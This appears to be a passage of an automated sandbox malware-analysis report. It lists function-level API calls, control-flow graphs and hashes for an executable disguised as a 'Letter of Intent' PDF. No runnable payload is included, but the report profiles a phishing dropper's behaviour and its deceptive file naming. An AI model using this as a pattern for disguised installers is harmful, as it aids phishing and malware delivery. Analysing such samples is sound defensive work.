                                                                                      control_flow_graph 974 1000177a-100017b6 call 10001b47 978 100018c7-100018c9 974->978 979 100017bc-100017c0 974->979 980 100017c2-100017c8 call 10002244 979->980 981 100017c9-100017d6 call 1000228e 979->981 980->981 986 10001806-1000180d 981->986 987 100017d8-100017dd 981->987 988 1000182d-10001831 986->988 989 1000180f-1000182b call 10002430 call 100015d5 call 10001280 GlobalFree 986->989 990 100017f8-100017fb 987->990 991 100017df-100017e0 987->991 996 10001833-1000186d call 100015d5 call 10002430 988->996 997 1000186f-10001875 call 10002430 988->997 1013 10001876-1000187a 989->1013 990->986 992 100017fd-100017fe call 10002acf 990->992 994 100017e2-100017e3 991->994 995 100017e8-100017e9 call 10002814 991->995 1005 10001803 992->1005 1001 100017f0-100017f6 call 100025b7 994->1001 1002 100017e5-100017e6 994->1002 1008 100017ee 995->1008 996->1013 997->1013 1012 10001805 1001->1012 1002->986 1002->995 1005->1012 1008->1005 1012->986 1017 100018b7-100018be 1013->1017 1018 1000187c-1000188a call 100023f3 1013->1018 1017->978 1020 100018c0-100018c1 GlobalFree 1017->1020 1024 100018a2-100018a9 1018->1024 1025 1000188c-1000188f 1018->1025 1020->978 1024->1017 1027 100018ab-100018b6 call 10001555 1024->1027 1025->1024 1026 10001891-10001899 1025->1026 1026->1024 1028 1000189b-1000189c FreeLibrary 1026->1028 1027->1017 1028->1024
                                                                                      APIs
                                                                                        • Part of subcall function 10001B47: GlobalFree.KERNEL32(?), ref: 10001D93
                                                                                        • Part of subcall function 10001B47: GlobalFree.KERNEL32(?), ref: 10001D98
                                                                                        • Part of subcall function 10001B47: GlobalFree.KERNEL32(?), ref: 10001D9D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001825
                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000189C
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018C1
                                                                                        • Part of subcall function 10002244: GlobalAlloc.KERNEL32(00000040,206AC300), ref: 10002276
                                                                                        • Part of subcall function 100025B7: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017F6,00000000), ref: 10002629
                                                                                        • Part of subcall function 100015D5: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001752,00000000), ref: 100015EE
                                                                                        • Part of subcall function 10002430: wsprintfW.USER32 ref: 10002484
                                                                                        • Part of subcall function 10002430: GlobalFree.KERNEL32(?), ref: 10002505
                                                                                        • Part of subcall function 10002430: GlobalFree.KERNEL32(00000000), ref: 1000252E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1767494692-3916222277
                                                                                      • Opcode ID: d8e83d36db9cd138fa1e7c220835458f63d921b67cb09b0acc1ec81116f64118
                                                                                      • Instruction ID: 9ce5796c09468563b87854c93ff8b18313010149d0a68b51a988a72ae56cc889
                                                                                      • Opcode Fuzzy Hash: d8e83d36db9cd138fa1e7c220835458f63d921b67cb09b0acc1ec81116f64118
                                                                                      • Instruction Fuzzy Hash: 1831BF75800244AAFB51DF749CC5BDA37E8EB043D0F158425FA4A9A08EDF74EA84C760
                                                                                      Function 00401F98 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                        • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,0040309B,0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0), ref: 00405055
                                                                                        • Part of subcall function 00404FFA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll), ref: 00405067
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID: OC
                                                                                      • API String ID: 334405425-1597561874
                                                                                      • Opcode ID: 787f7087dcc45d9016ad26904ddea309ea5aacf0c8de41e68cdde16ba3086542
                                                                                      • Instruction ID: a758f152f971d74a5f32e3130d7e663150c352659b46f9ca4e023949e3a286cd
                                                                                      • Opcode Fuzzy Hash: 787f7087dcc45d9016ad26904ddea309ea5aacf0c8de41e68cdde16ba3086542
                                                                                      • Instruction Fuzzy Hash: 0A21A771900216EBCF20AFA5CE49A9E7EB0AF09354F20413BF615B51E0D7BD8982DB5D
                                                                                      Function 00405C13 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C3D
                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C5E
                                                                                      • RegCloseKey.ADVAPI32(?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3677997916-1824292864
                                                                                      • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                                      • Instruction ID: 00e721c797755c7836c6f4ed3256767801ec87f36bc61f3e3d0d9508cf2ebacd
                                                                                      • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                                      • Instruction Fuzzy Hash: 2B015A3114020EEADF218F16ED08EEB3BA8EF45394F00403AF944D6220D735D964CFA9
                                                                                      Function 004059FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405A1C
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-678247507
                                                                                      • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                                      • Instruction ID: 8deae68b39d669cdf42b1d89707a3c20f7c4236b9c4ece7c5e704d7c998737b8
                                                                                      • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                                      • Instruction Fuzzy Hash: 18F03076710204BBDB008F59DD45E9FB7ACFBD5710F11803AEA45E7290E6B0AA548F64
                                                                                      Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                        • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,0040309B,0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0), ref: 00405055
                                                                                        • Part of subcall function 00404FFA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll), ref: 00405067
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                        • Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                                        • Part of subcall function 004054C8: CloseHandle.KERNEL32(?), ref: 004054FA
                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 3585118688-0
                                                                                      • Opcode ID: 997df12c4484bebe84cf5b876ea9f54c501e77fa7375a28645137b07e36dabe5
                                                                                      • Instruction ID: a0a11ceaad45723ae58f2ff6d071e31bf4f47f747fba83561e840ebc81ce61f1
                                                                                      • Opcode Fuzzy Hash: 997df12c4484bebe84cf5b876ea9f54c501e77fa7375a28645137b07e36dabe5
                                                                                      • Instruction Fuzzy Hash: D711A131A00205EBDF109FA0CD449DE7AB1EF44315F24413BE605B61E0C7798A92DB99
                                                                                      Function 004054C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                                      • CloseHandle.KERNEL32(?), ref: 004054FA
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 004054DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                      • Instruction ID: f0c92ffbe574dd0cc69d2483c13c623377a7ee9a819dd8a25a80ea7c4393050c
                                                                                      • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                      • Instruction Fuzzy Hash: 19E0ECB4500309ABEB009F64ED49E6B7BBDEB04304F018975A950F2150D774D9148B68
                                                                                      Function 004031A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                        • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                      • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004031CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 4115351271-517883005
                                                                                      • Opcode ID: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                                      • Instruction ID: 8de04b408351475945b63aae0c0c4e12a59e1662d208add100ced368eac5ea97
                                                                                      • Opcode Fuzzy Hash: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                                      • Instruction Fuzzy Hash: ACD09222156936B1D551322A3E06BCF190D8F467AEB22807BF844B90964A6C0AC219FE
                                                                                      Function 00401B22 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00685288), ref: 00401B92
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree
                                                                                      • String ID: Call
                                                                                      • API String ID: 3394109436-1824292864
                                                                                      • Opcode ID: dd03939840fb0e761b64650d6e69ae6f6d30e0bc565fec157a8d19055049d097
                                                                                      • Instruction ID: a46614000ffff33521666511047a5805fbdd1416f0f2d384ace6ef46eaf983fa
                                                                                      • Opcode Fuzzy Hash: dd03939840fb0e761b64650d6e69ae6f6d30e0bc565fec157a8d19055049d097
                                                                                      • Instruction Fuzzy Hash: 6E21A172600501EBC710ABA4DEC8D5E77B4AF4A314B24423BF111B72D0E678D841CF2D
                                                                                      Function 0040219E Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00406089: FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406094
                                                                                        • Part of subcall function 00406089: FindClose.KERNEL32(00000000), ref: 004060A0
                                                                                      • lstrlenW.KERNEL32 ref: 004021DE
                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004021E9
                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402212
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                      • String ID:
                                                                                      • API String ID: 1486964399-0
                                                                                      • Opcode ID: 6ecf75d0669a7ffa43f9291367428dcaf6cc2bdfc10e890a830a0b79b6e23dd5
                                                                                      • Instruction ID: a1e4541ea748a37230a98fe3f03b8279639291f6b9c525da1ef6ae8ee7bc0922
                                                                                      • Opcode Fuzzy Hash: 6ecf75d0669a7ffa43f9291367428dcaf6cc2bdfc10e890a830a0b79b6e23dd5
                                                                                      • Instruction Fuzzy Hash: 1F117371A1031596CB10EFE9CA0969EB6F8EF04344F10443BA505F71D1D6B899419B5C
                                                                                      Function 00402452 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,0000015B,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
